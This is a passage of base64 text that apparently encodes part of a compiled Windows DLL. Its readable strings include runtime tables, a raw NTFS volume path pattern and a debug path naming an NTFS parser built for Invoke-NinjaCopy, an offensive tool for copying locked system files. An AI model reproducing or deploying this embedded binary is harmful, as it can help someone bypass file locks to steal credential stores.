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RydWN0b3IgaXRlcmF0b3InAAAAAABgdmlydHVhbCBkaXNwbGFjZW1lbnQgbWFwJwAAAAAAAGBlaCB2ZWN0b3IgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAAAAAAABgZWggdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAGBlaCB2ZWN0b3IgdmJhc2UgY29uc3RydWN0b3IgaXRlcmF0b3InAABgY29weSBjb25zdHJ1Y3RvciBjbG9zdXJlJwAAAAAAAGB1ZHQgcmV0dXJuaW5nJwBgRUgAYFJUVEkAAAAAAAAAYGxvY2FsIHZmdGFibGUnAGBsb2NhbCB2ZnRhYmxlIGNvbnN0cnVjdG9yIGNsb3N1cmUnACBuZXdbXQAAAAAAACBkZWxldGVbXQAAAAAAAABgb21uaSBjYWxsc2lnJwAAYHBsYWNlbWVudCBkZWxldGUgY2xvc3VyZScAAAAAAABgcGxhY2VtZW50IGRlbGV0ZVtdIGNsb3N1cmUnAAAAAGBtYW5hZ2VkIHZlY3RvciBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAABgbWFuYWdlZCB2ZWN0b3IgZGVzdHJ1Y3RvciBpdGVyYXRvcicAAAAAYGVoIHZlY3RvciBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAGBlaCB2ZWN0b3IgdmJhc2UgY29weSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAAAAAGBkeW5hbWljIGluaXRpYWxpemVyIGZvciAnAAAAAAAAYGR5bmFtaWMgYXRleGl0IGRlc3RydWN0b3IgZm9yICcAAAAAAAAAAGB2ZWN0b3IgY29weSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAAAAAABgdmVjdG9yIHZiYXNlIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAAAAAAABgbWFuYWdlZCB2ZWN0b3IgY29weSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAAAAAABgbG9jYWwgc3RhdGljIHRocmVhZCBndWFyZCcAAAAAACBUeXBlIERlc2NyaXB0b3InAAAAAAAAACBCYXNlIENsYXNzIERlc2NyaXB0b3IgYXQgKAAAAAAAIEJhc2UgQ2xhc3MgQXJyYXknAAAAAAAAIENsYXNzIEhpZXJhcmNoeSBEZXNjcmlwdG9yJwAAAAAgQ29tcGxldGUgT2JqZWN0IExvY2F0b3InAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAIAAgACAAIAAgACAAIAAgACgAKAAoACgAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABIABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAIQAhACEAIQAhACEAIQAhACEAIQAEAAQABAAEAAQABAAEACBAIEAgQCBAIEAgQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAEAAQABAAEAAQABAAggCCAIIAggCCAIIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABAAEAAQABAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgACAAIAAgACAAIAAgACAAIABoACgAKAAoACgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQAB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AAeMABAECLAQAYiwEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAFiLAQAAAAAAAAAAAHiLAQDwigEAyIkBAAAAAAAAAAAAAAAAAAAAAAAAAAAAeMABAAIAAAAAAAAA/////wAAAABAAAAAQIsBAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAKDAAQDIiwEAoIsBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAADgiwEAAAAAAAAAAAAAjAEA8IoBAMiJAQAAAAAAAAAAAAAAAAAAAAAAAAAAAKDAAQACAAAAAAAAAP////8AAAAAQAAAAMiLAQAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAADQwAEAUIwBACiMAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAaIwBAAAAAAAAAAAAeIwBAAAAAAAAAAAAAAAAANDAAQAAAAAAAAAAAP////8AAAAAQAAAAFCMAQAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAowAEA8IkBAKCMAQAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAaMwBAPCMAQDIjAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAiNAQAAAAAAAAAAACCNAQDIiQEAAAAAAAAAAAAAAAAAAAAAAGjMAQABAAAAAAAAAP////8AAAAAQAAAAPCMAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAACIjgEAAAAAAAAAAAAY1AEAAAAAAAAAAAD/////AAAAAEAAAABIjQEAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAoI0BAAAAAAAAAAAAmI4BAOiNAQBgjQEAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAABI1AEAGI8BAMCNAQAAAAAAAAAAAAAAAAAAAAAASNQBAAEAAAAAAAAA/////wAAAABAAAAAGI8BAAAAAAAAAAAAAAAAAKjTAQACAAAAAAAAAP////8AAAAAQAAAAMCOAQAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAY1AEASI0BADiOAQAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAqNMBAMCOAQBgjgEAAAAAAAAAAAAAAAAAAAAAAGCNAQAAAAAAAAAAAAAAAADg0wEAAgAAAAAAAAD/////AAAAAEAAAACIjQEAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAMI8BAAAAAAAAAAAAAQAAAAAAAAAAAAAA4NMBAIiNAQDYjgEAAAAAAAAAAAAAAAAAAAAAAOiNAQBgjQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAACPAQAAAAAAAAAAABCOA